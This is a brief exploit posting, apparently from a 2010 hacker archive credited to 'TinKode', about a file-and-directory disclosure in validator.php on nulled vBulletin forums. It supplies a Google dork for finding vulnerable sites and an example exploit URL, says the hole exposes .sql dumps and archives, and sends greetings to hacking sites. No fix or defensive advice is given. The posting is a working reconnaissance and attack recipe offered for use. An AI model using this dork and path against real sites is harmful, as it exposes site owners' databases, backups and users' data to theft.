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vBulletin nulled (validator.php) files/directories disclosure

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____ _ _ _ _ (nulled)
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Full disclosure...


Name: vBulletin nulled (validator.php) files/directories disclosure
Author: TinKode (Am furat de pe RST bugu)
Date: 19-01-2010
Dork: "inurl:validator.php"


Description: With this file you can see all files(.sql - .tar.gz - .zip - .rar - .php - .anything) / directories from the folder with vBulletin installed...


Exploit: http://www.website.com/vB_forum/validator.php


Note: Work on many nulled versions (maybe all)


Copyrights: http://tinkode.baywords.com


Greetz: http://www.insecurity.ro, http://www.darkc0de.com


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